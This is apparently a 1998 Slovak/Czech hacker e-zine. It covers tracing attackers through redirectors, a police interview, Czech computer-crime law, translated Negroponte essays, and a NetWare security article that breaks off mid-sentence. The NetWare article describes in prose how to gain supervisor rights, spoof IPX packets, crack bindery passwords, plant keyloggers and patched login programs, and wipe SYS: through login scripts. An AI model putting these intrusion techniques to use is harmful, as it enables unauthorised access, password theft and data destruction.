povodne som sem chcel napisat nieco ako presny navod na obsluhu redirektorov
ktore su na arxive. mam totiz dojem ze kopu ludi ich nedokaze sprane a naplno
vyuzit. nakoniec som sa vsak rozhodol nezverejnovat tu nejake presne step-by-step
navody, predsa len je dobre spravit nejaku latku, vstupny schod, cez ktory musi
kazdy sam a bez cudzej pomoci prekrocit. takze hrajte sa, skusajte, mrknite sa
do zdrojakov :) kopu funkcii napriklad interaktivneho redirektora z dielne CzERT
nebolo nikdy dokumentovanych a neexistuje k nim ziadny navod.


ok, teraz obratme sachovnicu a mrknime sa na situaciu z pohladu hraca
bielych figuriek. ako dokaze administrator vystopovat niekoho kto mu
utoci na server cez redirektor, alebo cez siet redirektorov ? kedysi ked
fungovala CzERT BBS, rozvinula sa na nej zaujimava debata na tuto temu.
boli pretriasane vselijake teorie o tom ako sa daju pomocou nejakych
komplexnych statistickych vzorcov vytiahnut z traffic logov podobne pripojenia
a podla toho urcit kto sa odkial a kam redirektuje. debata sa vysvihla na vysoku
akademicku uroven a vzapati pleskla na zem, pretoze sme sa zhodli na tom
ze take nieco je nielen nemozne, ale aj blbost.



jedina moznost je vyckat kym hacker spravi chybu. je dobre pozriet si
napriklad logy z httpd. poznal som hackerov ktori sa telnetovali na
hacknuty stroj cez 2-3 redirektory, ale zaroven si pozerali webovske stranky
toho isteho server priamo zo svojho Netscapu. Pomerne uspesny sposob je
zavesit si robota na vsetky zname irc kanaly kam chodia slovenski/ceski
hackeri (nebudem radsej menovat :) a pozriet si kedy je kto pripojeny na irc
a kedy sa kto pripajal na hacknutu masinu. vinnik sa da obcas najst pomerne
lahko takymito odrbmi netechnickeho charakteru :)

...to be continued.. casom mozno este dopisem nejaku pointu..

..dneska to uz nestiham :) ..



pajka, pajka(at)hysteria.sk


navrat na obsah





rozhovor s JD


capitano jiri dastych z prazskeho oddelenia comedia de l'arte
ministerstva vnutra ceskej republiky sa tesi vcelku slusnej popularite
na slovenskom a ceskom internete. Praca prveho cyber-copa v dejinach
nasich zemi spociva v tom ze sa par krat do roka
pripoji na mamediu (www.mageo.cz) a odpoveda na inzeraty ponukajuce
CDecka s warezom, nasledne po stretnuti s naivnym warezakom mu nasadi
puta. no a potom o tom rozprava. a potom este viac o tom rozprava.
par krat do roka organizuje koncertne turne, na ktorom
keca s novinarmi, organizuje seminary a beseduje na stretnutiach na
vysokych skolach.



vdaka svojim ortodoxnym nazorom, tvrdohlavemu postoju, neznalosti
technickych veci a moralistickym kecom si z neho vacsina ludi na inete
robi posmech. ja ho vsak obdivujem a to minimalne koli jednej veci -
ako jediny clovek v tejto krajine je plateny za to ze cita prielom -
je to totiz v naplni jeho prace. no uznajte, to je ale super robota ! :)


From: dastych(at)mvcr.cz
To: kangaroo(at)hysteria.sk
Subject: Re: Rozhovor
Date: Mon, 4 May 1998 10:31:48 +0200

>Preji hezky Beltine!
>
>Dekuji za moznost polozit Vam par otazek, co se tyce pocitacove
>kriminality.
>
>Prvnich nekolik otazek se tyka Vaseho boje proti hackerum
>
>1) Pokud se Vam podari nejakeho hackera chytit, z ceho je obvinite?

Z trestneho cinu podle paragrafu 257a trestniho zakona, ktery je
zameren na ziskani neopravneneho pristupu k nosici informaci s
umyslem zpusobit skodu nebo ziskat neopravneny prospech.

>
>2) Na tiskove konferenci v Brne jste pry prohlasil (nevim to jiste,
>tiskova zprava pry nebyla uvolnena), ze pri pristim utoku cleny Czertu
>dozajista chytite. Pote hackeri napadli server www.policie.cz a upravili
>titulni stranku, pri cemz parodovali vase prohlaseni. Jak jste se citil,
>jak jste reagoval a kdy budou zadrzeni?

Nejsem si jist zda jsem presne rekl neco takoveho. Spise si myslim, ze jsem
rekl, ze je dalsi utoky priblizuji konci jejich hackerske kariery. Jinak..
citil jsem se normalne, nemyslim si, ze skadleni Policie opakovanim napadeni
web stranek je to nejrozumejsi.

>
>3) V jakem stadiu je Vase patrani po hackerech? Uz jste nekoho zadrzeli
>a pripadne obvinili?

Nezadrzeli ani neobvinili. Takovy zasah do prav obcana si vyzaduje naprosto
perfektni pripravu aby jsme nemohli byt napadani, pro pochybnosti a
prehmaty.

>
>4) Ma pro Vas dopadeni skupiny Czert ci Sert nejaky osobni vyznam?

Ne. Myslim si, ze je z sirsich duvodu nutno zabranit protipravnim aktivitam,
ktere at z ruznych duvodu pozkozuji nekoho jineho.

>
>Nasledujici otazky se tykaji pocitacoveho piratstvi, cimz myslim
>kopirovani a rizeni nelegalniho softwaru
>
>1) Muzete prosim ctenarum rict par slov o vasi praci? Jak probiha
>hledani, zatceni a obvineni takoveho pirata?

Jde o standardni policejni praci, ale v tomto pripade namirenou proti
porusovani paragrafu 152 trestniho zakona - porusovani autorskeho prava. Hledani je
pomerne jednoduche - z volnych zdroju jako je inzerce a pod., oznamenim
autoru a nebo oznamenim poskozenych lidi, kteri si v nekterych pripadech i
mohli myslet ze kupuji legalni software (OEM), ale nebylo tomu tak.
Zatceni je naprosto obvykle - prijdeme, zjistime co muzeme, a odejdeme spolu
s pachatelem, na zaklade dukazu ja nasledne obvinen vysetrovatelem z
trestneho cinu.

>
>2) Jak byste postavicku pirata charakterizoval? (jak je ochotny
>vypovidat, kolik toho prozradi o svych spolecnicich, o tom co dela, zda
>klade vetsi odpor pri zatykani....)

Obvykly pachatel je clovek ochotny a spolupracujici, pravda az po predlozeni
dokuzau, ktere ma k dipozici policie. Pri zatykani neklade odpor, ostatne by
byl zbytecny.

>3) Prave na poli sireni nelegalniho softwaru slavite cetne uspechy.
>Muzete ctenare seznamit s nekterymi z nich?

Myslim, ze to by vydalo na samostatny clanek.

>4) Jaka je spoluprace s BSA?

Pro nas predstavuje BSA jednaznacny prinos, protoze je sdruzenim autoru,
kteri aktivne chrani sva prava a to je presne to co je potreba. Spoluprace
je velmi dobra a ma tendenci ke stalemu zlepsovani.

>6) Je neco, co byste pocitacovym piratum rad vzkazal ?

Je nanejvys nutna, aby vsichni znali zakony teto zeme, protoze pak teprve
uvidi co je mozne a co ne. Nemyslim tim, nezabije a nepokrades, ale treba i
znalost ochrany autorskych prav by mnoho slusne lidi odradila od nelegalnich
aktivit, ktere jsou pak pricinou jejich trestniho stihani.


kangaroo, kangaroo(at)hysteria.sk


navrat na obsah




Pocitacova kriminalita


Vzhledem k aktualnosti tohoto tematu jsem sestavil rozcleneni pocitacove
kriminality v kontextu trestniho zakona CR.



Rozlisujeme primou a neprimou pocitacovou kriminalitu. Primou pocitacovou
kriminalitou je napriklad:



- ilegalni vyroba pocitacove techniky (hardware) kopirujici cizi vzory,

- ilegalni kopirovani programu (napr. software), tj. pocitacove piratstvi,

- neopravnene uzivani prace pocitacu (kradeze strojoveho casu),

- niceni a poskozovani pocitacu a programu (pocitacove sabotaze),

- neopravnene ziskavani informaci z databazi.



Neprimou pocitacovou kriminalitou je napriklad:



- vkladani lzivych dat do pocitacoveho systemu,

- meneni vysledku pocitacoveho zpracovani dat,

- meneni programu.



Nektere z techto forem pocitacove kriminality jsou praktikovany i
zlocineckymi organizacemi pri zahlazovani vlastni kriminality, vytvareni
podminek pro prani spinavych penez i pro dalsi trestnou cinnost. Pocitace
mohou byt vyznamnym pomocnikem i na useku hospodarske kriminality
(zkracovani dani a jine). Nekteri autori vylucuji z pojmu "pocitacova
kriminalita" ty trestne ciny, v nichz pocitac figuruje pouze jako vec,
tedy jeho kradez a poskozeni, pokud ovsem utok nesmeruje k technickemu
nebo programovemu vybaveni pocitace. Pro zjednoduseni vynechavaji i ciste
softwarove piratstvi, jakkoli jiste predstavuje znacny problem.



Pod pojem pocitacove kriminality radi tito autori nasledujici skutky:



1. Utok na pocitac, program, data, komunikacni zarizeni.

Zde prolinaji dve roviny: utok na fyzicky objekt pocitace nebo jeho
prislusenstvi (odcizeni, poskozeni) a utok na informace v pocitaci ulozene.



2. Neopravnene uzivani pocitace ci komunikacniho zarizeni.


Patri sem napr. "pocitani" na pocitaci, pouzivani programu nebo
komunikacniho zarizeni, ktere nalezi nekomu jinemu, bez vedomi a souhlasu.



3. Neopravneny pristup k datum, ziskani utajovanych informaci (pocitacova
spionaz) nebo jinych informaci o osobach.



Nestaci pouhy prunik do databazi, nybrz musi dojit k neopravnenemu zneuziti
ziskane informace.


4. Zmena v programech a datech (okrajove i v technickem zapojeni pocitace
ci komunikacniho zarizeni).


Sem patri tyto cinnosti:


a) zmena programu a dat jinymi programy - obvykle viry nebo primymi zasahy
programatora (caste pri tzv. pocitacove defraudaci),

b) mene casto uprava v zapojeni ci jinem atributu technickeho vybaveni
pocitace ci komunikacniho prostredku.



5. Zneuzivani pocitacovych postredku k pachani jine trestne cinnosti.


Manipulace s pocitacovymi daty ma nekolik vyhod, napriklad:


- vymazani ci premazani udaje na magnetickem mediu je podstatne snazsi
a nezanechava prakticky zadne stopy,

- clovek (kontrolor, zakaznik aj.) povazuje vysledky z pocitace z
psychologickeho hlediska a priori za spravne a vice jim duveruje.



6. Podvody pachane v souvislosti s vypocetni technikou.


Pachatel jiz a priori vytvari program, ktery mu ma pozdeji usnadnit jeho
trestnou cinnost.


Softwarovou kradezi rozumime kopirovani softwaru bez povoleni vlastnika
copyrightu. Formy softwarovych kradezi jsou ruzne, napr. neautorizovane
vytvareni duplikatu, neautorizovane kopirovani programu pro vlastni uziti
a prodej softwaru chraneneho autorskymi pravy ci copyrightem ve tvaru
blizkem originalu, ulozeni na pevny disk pocitace dealerem nad ramec
dohody s vlastnikem software.



Pri urcitem zjednoduseni lze pocitacovou kriminalitu rozdelit do dvou
zakladnich skupin:



a) delikty, kde je pocitac (program, data atd.) nastrojem zlocince,

b) delikty, kde je pocitac (program, data atd.) cilem zlocinneho utoku.



Porovnani klasifikace materialu Rady Evropy s ekvivalenty v nasem trestnim zakone:


Rada Evropy Ceska Republika

pocitacove podvody podvod - par. 250, 250a
pocitacove falzifikace

poskozovani pocitacovych poskozovani a zneuziti zaznamu
dat a programu na nosici informaci - par. 257a

pocitacova sabotaz sabotaz - par. 97, obecne ohrozeni
par. 179 - 180, poskozovani cizi veci par. 257

neopravneny pristup neopravnene uzivani cizi veci - par. 249

neopravneny prunik neopravnene uzivani cizi veci - par. 249

neopravnene kopirovani porusovani autorskeho zakona - par. 152
autorsky chraneneho programu

neopravnene kopirovani porusovani autorskeho prava - par. 152,
topografie porusovani prav k vynalezu
a prumyslovemu vzoru - par. 151
(dale take podle zak. c. 529/91 Sb.
o ochrane topografii pocitacovych vyrobku)

zmena v datech nebo poskozeni a zneuziti zaznamu
pocitacovych programech na nosici informaci - par. 257a

pocitacova spionaz vyzvedacstvi - par. 105, ohrozeni
stat. tajemstvi - par. 106,
ohrozeni hospodarskeho tajemstvi
- par. 122, ohrozeni sluzebniho
tajemstvi - par. 173

neopravnene uzivani pocitace neopravnene uzivani cizi veci - par. 249

neopravnene uzivani autorsky porusovani autorskeho zakona - par. 152
chraneneho programu



udc, udc(at)hysteria.sk


navrat na obsah




dalsia miliarda



Kto bude dalsou miliardou uzivatelov ?



Casto si davam otazku: "Budu mat bohaci v buducnosti bohate informacie a
chudobni informacie chudobne ?" Moja odpoved znie: "Nie." Ale hodnostim to
asi narychlo a prilis jednoducho.



Ak suhlasite s tym, ze Net bude mat v buducom storoci miliardu uzivatelov,
tak sa pravdepodobne domnievate, ze vacsina z nich bude vo vyvinutych
krajinach. Nakoniec, z priblizne 10 milionov pocitacov, ktore dnes existuju
je viac ako polovica v USA. Vacsina zvysnych sa nachadza v siedmych
najrozvinutejsich krajinach sveta. Skutocne, 50 najmenej rozvijajucich sa
krajin, s prijmom mensim ako 500 dolarov na jedinca, v sucastnosti hosti
23 providerov (a co je zvlastne , 19 je v Nepale). Moj nazor je, ze prave
dnes su drahe informacie pre bohatych a lacne su pre chudobu.



Ale to sa zmeni. Zoberte si krajinu, ako je Malajzia, kde si ludia skutocne
vazia vzdelanie a vladu a znesu pri tom aj drobne tyranie, podporuju vyvin
v ohromnej miere. V tomto momente je v Kuala Lumpur 20 000 uzivatelov
Internetu a ich pocet rastie o 20% kazdym mesiacom. Ak bude Malajzia
pokracovat v tomto trende , vsetci Malajzijcania (19,1 miliona obyvatelov)
budu pripojeny na Internet v roku 2000. Malajzia ale nieje jedina krajina s
takymto prirastkom uzivatelov.



gung-hoism



Zoberte si najenergickejsieho cloveka vo vasom okoli, ktory sa nadsene chopi
zbierania nezmyslov, starania sa o deti a vybavovania miestnych obcianskych
veci. Sused, ktory prichadza do uvahy sa pravdepodobne pristahoval len
nedavno, Inac povedane, najochotnejsi spomedzi nas su casto ti, ktori medzi
nas patria najkratsie. Vsetci sme priatelski k novym uzivatelom emailu,
ktori nas zaplavuju nekonecne dlhymi a nudnymi listami. Toto sa moze stat v
globalnom rozsahu a bude to nieco ako ocean, ked si uvedomis, ze India a Cina
reprezentuje viac ako 2 miliardy ludi. Ale rozdiel medzi pouzivanim pocitacov
pre email a napriklad pre zakladne skolstbo je, ze v prvom pripade moze byt
uzivatel zaslepeny, zatial co pri druhom mu to moze poskytnut "zakladnu vyzivu
digitalneho stravovania."



Takze som velky optimista, najma co sa tyka vyvinu noveho digitalneho sveta.
Viac ako polovica populacie dnesneho sveta ma menej ako 20 rokov. Tato
skupina mladych ludi je vacsinou povazovana za zodpovednu. Tito ludia by
mohli byt vo vyvine novej digitalnej etapy ludstva velmi prospesni. Najma v
krajinach, kde tvoria vacsinu obyvatelstva.



Vsetci vieme, ze deti beru pocitace ako ich novy jazyk. Ak im date sancu,
chytia sa jej a do pocitacov sa zahlbia s vasnou, rozkosou a elanom. Ked
boli PC-cka este len "osobne pocitace", vzdelavacie moznosti - specialne vo
svete vyvoja - boli limitovane mnozstvom softwareu a jeho primeranostou. S
Internetom sa to dramaticky zmenilo. Uz nieje potrebne podrobne zapisovat
kazdy krok. Deti mozu ucit ine deti z celeho sveta. Dovod pre ucenie sa
citat a pisat bude zretelny.



Dva napravitelne problemy



Teraz potrebujeme prinajmensom 500 000 mladych muzov a zien z
'vyvinu-chtivych' skupin , ktori dobrovolne stravia rok pre vyvin sveta,
napriklad ako skolske zbory - nieco ako Mierove Spolky. Kazdy z tychto
mladych ludi moze sluzit ako priklad pre viac ako 100 deti v 48 krajinach
povazovanych Unescom za najmenej vyvinute. Univerzity by mohli mudro
podporovat takuto iniciativu a obetovat nejake financie pre studentov mimo
domu.



Takato namahava praca moze stat priblizne tak vela ako zopar F-15-tiek.
Problem vsak nie su peniaze, ale to, ako to spravit. Pod cijou spravou a
s akymi peniazmi ? Unesco je privelmi politicky zamerane. A Svetova Banka
by chcela svoje peniaze spat. Teraz je vhodny cas zalozit nove Spojene
Narody pre Cyberspace, organizaciu s 5-rocnym planom vytvorit digitalny
svet lahko dostupny pre vsetkych. Nemoze to byt spravene postupne v krajine
za krajinou. Vlada sa rozhybava velmi pomaly a najma co sa tyka novych
digitalnych technologii. Nieco nove je velmi potrebne. Ak mas dobry napad
tak ho vyslov. Pouzi email. Myslim to vazne.




negroponte, nicholas(at)media.mit.edu

preklad lubo gabal, gabal(at)vadium.sk


navrat na obsah





00000001000001020061730200619027
pajkus
 pajkus      03.03.2004 - 12:04:16 , level: 1, UP   NEW



::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #6, 28.4.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/




obsah



intro

000 000 111 - dvojiti agenti

bezpecnost novell netwaru

niekolko krokov k zvyseniu bezpecnosti linuxu slackware 3.4

unix logy

hackeri - sexualny idol informacneho veku







intro



tento vikend som sa uchylil na chatu na severe slovenska. natiahol som si
predlzovacku vonku do zahrady, vyvalujem sa na slnku a sledujem suseda
koncertovat na cirkularke... jeho manzelka, drobna sympaticka zienka,
volaco sadi v zahrade. pripada mi to take divne premyslat tu o negroponteho
uvahach o internetovskych agentoch-programoch s umelou inteligenciou, zda
sa mi to teraz byt take odtrhnute od reality, ked sa tu predo mnou odohrava
boj o prezitie. na buduci vikend sa chystam do prahy do terminal baru,
tam aspon v tej komunitke inet nadsencov nebudem citit tu potrebu ist
ponahadzovat kompost na zahradu namiesto snivania o buducnosti internetu.



som rad ze na moju vyzvu v minulom cisle reagovalo zopar ludi. dohodol som
sa na spolupraci s niekolkymi velmi zaujimavymi ludmi a pripravuje sa
zopar zaujimavych clankov a prekladov. stay tuned.



pajkus, lazy pod makytou, 26.4.98





000 000 111 - dvojiti agenti



Ked za Vas niekto pokosi travnik, umyje Vam auto, alebo vycisti oblek,
v hre je velmi malo sukromia. Ked vsak odovzdate manazment Vasich zdravotnych,
pravnickych, alebo financnych zalezitosti do ruk inemu cloveku, zalezi to
na Vasej ochote odhalit svoje velmi osobne a sukromne veci. Aj ked
prisahy a pravo ochranuju niektore osobne informacie, v skutocnosti neexistuju
regulacie proti uniku intimnych informacii tretimi osobami - ludskymi asistentami.
Vsetko je zalozene iba na dovere a vzajomnom respekte.



V digitalnom svete sa takato ohladuplnost a skutocna dovera dosiahe omnoho
tazsie, ak vezmeme do uvahy absenciu skutocnych alebo odvodenych hodnot v
pocitacovom systeme. Navyse spolocnost elektronickych agentov bude moct
komunikovat omnoho efektivnejsie ako zbierka ludskych kucharov, upratovaciek,
soferov a masiarov. Klebety sa stavaju faktami a siria sa rychlostou svetla.



Pretoze stale tvrdim vo svojich clankoch a prednaskach ze inteligentni agenti
su jednoznacna buducnost informacnych technologii, vzdy sa ma pytaju na otazku sukromia.
Avsak ludia tuto otazku kladu bez toho aby plne chapali aka je sukromie dolezita
vec. Casto prednasam na seminaroch urcenych pre manazerov v drahych
hoteloch a obcas ohlasim na prednaske tymto manazerom (vacsinou muzom), ze som sa dohodol
s manazmentom hotela, ze mi daju zoznam filmov ktore si na hotelovej izbe
predoslu noc pozerali. Ked v prednaskovej hale zbledne polovicka tvari, priznam
sa ze zartujem. Ale nikto sa nesmeje. Je to dost vystizne, ale ani nie tak vtipne.



Z nicoho nic nase najmensie aktivity zanechavaju digitalne stopy. Zatial su tieto "bit-stopy"
izolovane utrzky velmi malych casti nasho zivota. Ale casom ich pribudne, prekryju sa a
budu navzajom komunikovat. Video-pozicovna, banka, alebo telekomunikacna firma budu zrazu moct
vytiahnut svoje bity a par udermi do klavesnice mozu o Vas velmi vela zistit.
Toto je iba zaciatok: kazdy nakup cez kreditnu kartu, kazda platba v obchode s potravinami,
kazda postova zasielka sa moze pridat do tejto rovnice. Extrapolujte si
tuto predstavu do buducnosti a, skor ci neskor, budete iba priblizna podoba Vaseho
pocitacoveho modelu. Vadi Vam to ?



Hermes a hermetika



Mne to nevadi a vysvetlim preco. Informacie o tom komu som telefonoval,
co som pozeral, alebo kde som sa bol najest nie su az tak zaujimave v porovnani
s informaciami preco som to spravil a s informaciami nasledujucimi moj cin
(Jedlo mi chutilo, mojmu hostovi chutilo, alebo nikomu nechutilo, ale nechceme
to priznat). Skutocnost ze som sa bol niekde najest je takmer bezhodnotna, pokial
je neznamy dovod a vysledok mojho skutku. Ciel, dovod a nasledne pocity
su omnoho dolezitejsie ako samotny skutok alebo rozhodnutie. Zanecham iba
par digitalnych omrviniek pre spolocnosti s direct-marketingom, tym ze odhalim
skutocnost, ze som sa bol napriklad najest v nejakej restauracii.
Zajumive data su uchovane agentom, ktory mi rezervoval stol v restauracii
a ktory sa ma potom neskor spytal ako mi chutilo.



V sucastnosti sa marketingovi odbornici snazia zrekonstruovat proces rozhodovania
zakaznikov a zistit na zaklade coho sa rozhodol. Reklamne agentury luskaju
statisticke data aby zistili preco som si kupil prave tento druh mydla a nie nejaky
iny. Toto sa v buducnosti zmeni. Budeme moct povedat pocitacovemu agentovi
co chceme, kedy to chceme a tym vlastne aj ako postavit model nas samych -
zbierku rozhodnuti z minulosti, pritomnosti a z buducnosti (tak daleko ako
my sami vieme). Takyto agenti budu moct sledovat a filtrovat informacie
a anonymne dat digitalnemu obchodnemu svetu najavo, ze nieco hladame.



V takomto sceneriu budu existovat dva druhy agentov: jeden zostane doma
(na Vasom zapasti, vo Vasom vrecku, alebo vo Vasom radiu) a jeden zostane
na Internete, surfovat namiesto Vas, prenasat informacie tam a spat.
Do isteho stupna budu takyto agenti hermeticky uzavreti. Budu citat tok
bitov o produktoch a sluzbach ktore budu vysielane na kablovych a bezdratovych
kanaloch. Z tohoto mora informacii vyselektuju specialne data na zaklade
Vasich osobnych zaujmov a preferencii - cinnost tak jednoducha ako napriklad
vyber informacie o cene akcie, ktoru vlastnite, a az tak zlozita ako
napriklad vybratie pre Vas zaujimavej casti televizneho serialu. Tito
agenti budu "same ucho".



Informacni agenti budu zlozitejsi. Budu fungovat tak ako my fungujeme dnes, ked
surfujeme Net a hladame zaujimave veci a ludi. Teraz sme v takom stadiu ze si
mnohi ludia myslia ze Netscape a ostatne browsery su jedinou buducnostou Internetu.
Nie su. Uz aj dnes ludia ktori surfuju Net musia mat na to vela casu. V
buducnosti bude surfovat Net menej ludi ako dnes chodi do kniznice. Budu to
za nas robit agenti.



Ked hovorime o sukromi, najviac by sme sa mali obavat takychto Internetovskych
agentov. Budu musiet byt nedotknutelni a nehacknutelni. Musime vyvinut
technologie ktore zabrania moznemu uniku informacii od takychto agentov.
Znie to smiesne ? Pockajte ked sa zacnu na sudoch hadat o tom ci takyto
pocitacovi agenti mozu proti nam svedcit.



Clipper lode



Bezpecnost a sukromie su hlboko prepletene. Vlada chce aby sme sa plavili v
oceane informacii, ale chce mat moznost kedykolvek naskocit na nasu (Clipper)
lod. Toto rozculuje ludi a vznikla z toho obrovska debata. Ja iba zivam.
Vysvetlim preco.



Sifrovanie nie je obmedzene na jednu vrstvu. Ak chcem poslat niekomu
tajny odkaz, slubujem ze to dokazem, bez akehokolvek rizika ze by to niekto
dokazal desifrovat. Jednoducho pridam jednu sifrovaciu vrstvu, pouzitim
neprelomitelneho kodu. Taketo kody nemusia byt genialnymi vytvorami matematikov,
alebo vysledky masivnej elektroniky, ale mozu byt jednoduche ale bezpecne.



Na dokaz tohoto som dal 105 riadkov dvanastich bitov do tiraze svojej knizky,
Being Digital. Tieto bity obsahuju odkaz. Stavim sa ze nikdy ho nedokazete
dekodovat. Ak to chce skusit trebars aj cely rocnik ostrych studentov matematiky,
nech sa paci. Wired casopis Vas bude dlho ospevovat. Ani zdaleka to nie je
take jednoduche, ako dekodovat nazov tohoto clanku: James Bond.


nicholas negroponte, nicholas(at)media.mit.edu

preklad pajka(at)hysteria.sk



navrat na obsah




bezpecnost novell netwaru



Tak jsem se rozhodl napsat clanek o (ne)bezpecnosti NetWare,
protoze 99% siti, ktere jsem videl maji zavazne bezpecnostni nedostatky (a
supervisitori s tim nechteji nic delat, jsou vetsinou BFA) -
KATASTROFA.
Nemyslim si, ze netware je nebezpecny system, prave naopak, ale musi
byt dobre nakonfigurovany. Tento clanek jiz vysel v Netmagu (http://netmag.cz/),
toto je jeho upravena verze. Cele je to jedna velka slatanina, tak mi
za to prosim nenadavejte. Pokud vas z toho cokoliv zajima, muzu se o tom
trochu rozepsat. Pokud mate o neco zajem nechte mi nekde vzkaz.



Nejvice der je vzdycky v pristupovych pravech. Mylne si spravci
mysli, ze prava write k .exe souboru nikdo nezneuzije (neb to ON
neumi). Omyl. Nemusi se ale v zadnem pripade jednat jen o spustitelne
programy,
"patchnout" se da prakticky cokoliv, treba i neskodne vypadajici
(opravdu jen vypadajici) .bgi soubor (chcete to predvest?).
Dalsi chybka je v povoleni
prava modify & write do mail directory (sys:mail), ve kterem je
ulozen take
login script (u 3.x), takze neni problem ho supervisorovi zmenit, aby
treba sejmul cely SYS:. Nezapomente taky kazdemu novemu userovi vyrobit
Login Script, protoze do SYS:MAIL maji useri pravo Create, z cehoz vypliva,
ze kdokoliv muze login script vyrobit.



K (ne)velkemu prekvapeni se data prenaseji po siti (jako obvykle) v
nekodovane podobe. Z toho plyne, ze jakmile user odchyti pakety, ve
kterych prenasite dulezity soubor, ma ho taky <g>. To je ale moc
namahave, takze je jednodusi si nejak pridelit prava. Treba tak, ze
prijde k serevru a naloaduje NLMko, ktere ho udela adminem, nebo kdyz
nema pristup k serveru, tak odchytne packet s heslem na rconsoli
(ktere je velmi jednoduse kodovane...). Dalsi metoda jak se udelat
superuserem je poslat na server packet s prikazem s falesnou IPX
adresou - a to adresou prave prilogovaneho supervisor-equivalenta. Tato
feature se da nastesti na serveru vypnout, ale defaultne vypnuta neni, takze to
jde v 99% pripadu ;(. Mimochodem, uz na to existuje pekna radka programu -
treba BLogout, hacknet, ... (vzdyt je to tak jednoduche, podporuje to
sam IPX driver...)



Dalsi zastavka bude u Bindery a NDSky. Zacneme bindery, ktera je
starsi. Prvni dira se vyskytuje u nekterych revizi NW 3.12, NW
server v urcitych situacich neprepise blok pameti, ve kterem mel
ulozene rozkodovane heslo. V cem je problem? Kdyz se vytvari user,
tak se mu nastavi heslo a identification, takze se obcas pouzije
buffer s heslem ... a to se za vlastni identification zapise ;((.
Mimochodem, tato chyba je pomerne oblibena na CVUT v Dejvicich. V
bindery je (stejne jako v NDSce) samozrejme mozne schovat nejakeho
uzivatele, takze ho nikdo neuvidi. Dalsi moznosti, jak zjistit neci
heslo je ziskat soubory s bindery (treba zalohy, .oldy,...) a ty
potom slovnikem nebo brute-force dekodovat. Taky by nemel byt problem
odchytit packety s NDSkou, kdyz se synchronizuje, ale niky jsem to
nezkousel. Snad ani nemusim podotykat, ze format bindery a NDSky je
crackery VELMI dobre zdokumentovany, stejne jako algoritmy kodovani
hesel (Viz Bindery scalpel, Pandora, atd)...



Nikdy nedavejte server do mistnosti pristupne userum, jak jsem psal
vyse, je velmi jednoduche si pres nej pridelit superv. prava. Obcas
je konzole serveru zaheslovana z monitor.nlm, ale odheslovat takovyto
server je prace na par vterin (treba z debuggeru,...). Je stale jeste
moznost prikazem SECURE CONSOLE server trochu vice
zabezpecit, takze user bude znacne omezen. Problem je ale v tom, ze bude omezen
znacne i spravce serveru ;( Nicmene i takto zabezpecena konzole se da
odheslovat... A kdyz jsme byli u toho debuggeru, tak taky neni problem napriklad
"upravit" server, aby nekontroloval hesla. Rozhodne nedoporucuji pouzivat
rconsoli a jine zcela bezpecne nastroje na spravu serveru a uzivatelskych
stanic. Mezi tyto zcela bezpecne utility radim vsechny ty exacy, hini, remote mgmt,
...etc. Velmi jednoduse se vetsina z nich da cracknout ipx spoofingem.



Oblibene utility mezi crackery jsou take ruzne sledovace klavesnice,
zapisovace hesel, atd. Utilit tohot druhu je prilis mnoho a tak se
pomerne hojne pouzivaji. Velmi produktivni byla skupina YTMAR, ktera napsala
nejmene 3 kousky (ty znam a vim o nich, urcite jich ale bude jeste vic). Ty
nejjednodussi "spioni" hesla nechavaji v pameti, takze si je musite
vyzvednout. Dalsi varianta je posilat hesla pres IPX/SPX. SPY + NSPY
pracuji tak, ze chycena hesla zapisuji do 0. stopy hard disku. A ty
"nejinteligentnejsi" je zapisuji nekam do souboru. Existuje taky
patchnuty login.exe, ktery zapisuje hesla do bindery; to pouzitelne ale pouze,
kdyz je nw cracknuty. Vsechny tyto programy pracuji 100% na NW3.12. Pokud
je pouzijete u 4.x verze, vetsina z nich prestane chodit. IMHO to je ale
jedno, protoze takovyto postup je velmi slozity a neefektivni, takze
ho pouzivejte az ve stavu opravdove nouze. Vzdyt server jde ve vetsine
pripadu cracknout mnohem jednoduseji :-)).



Dalsim problemem je, ze supervisori doufaji, ze useri neziskaji
ovladace a klienta k NetWare, aby prekonali ochrany. Neni nijak
neobvykle, ze pri bootu se natahuje plno bezpecnostnich programu (napriklad zamek
floppydisku, sledovatko cinnosti, ...) a supervisor tise doufa, ze se
nikomu nepodari nabootovat z diskety a pripojit se na server, aby prekonal
ty zabezpecovatka.
Nebo se ochrana muze volat z login scriptu (co tak se prilogovat bez
login scriptu?). Ne, toto neni cesta vedouci k uspechu.



Nakonec se podivame na jinou vec (ktera s bezpecnosti nema nic
spolecneho) - kradeni licenci k NetWare.
vzhledem k tomu, ze netware neni zrovna nejlevnejsi, tak je pomerne
caste. U NW4.x je lze dokonce skladat, u NW3.x muzeme pouzit pouze tu
nejvyssi. Verze 3.x ma licenci ulozenou primo v server.exe, z cehoz
vyplyva
predchozi. NW 4.x je ma ulozene v adresari SYS:_NETWARE
(popripade na licencni diskete). Tento adresar je pro crackery velmi
zajimavy - je v nem ulozena hromada uzitecnych informaci: vyse
jmenovane
licence, soubory NDSky, ...etc. Do SYS:_NETWARE se dostanete pouze ze
serveru (A ani na nem ho neuvidite v dirlistu SYS:). Ze stanice nemate
vubec narok. Pokud jej budete proskoumavat, doporucuji si stahnout
mc.nlm,
jcmd.nlm, nwshell.nlm, popripade nejaky dalsi shell. Muzete se do nej
taky podivat z rconsole (verze 4.x a vyse), ale neni to prilis efektivni.




Do ted' jsem popisoval jak bourat netware "zevnitr", tzn musite mit
pocitac s ipx routovatelnym primo k NetWare. Nebylo by ale jednodussi to bourat
treba pres internet? Jiste, i tato moznost tu je. IPX packety lze
"zabalit" do UDP, takze no problem. Na protejsim serveru musi byt nastaveny
tzv. IP tunell a mate vyhrano. Pokud je nejaka komunikace jiz "established",
muzete ji napr. prebrat. To udelate tak, ze reknete nejakemu routeru aby
neroutoval packety tam kam by se melo ;). IP TUNELL muze byt
samozrejme kodovany, ale neznam nikoho, kdo to pouziva. Vice informaci naleznete
v RFC, konkretne rfc1234 (hezke cislo, co?). IP TUNELL pouziva UDP port 213,
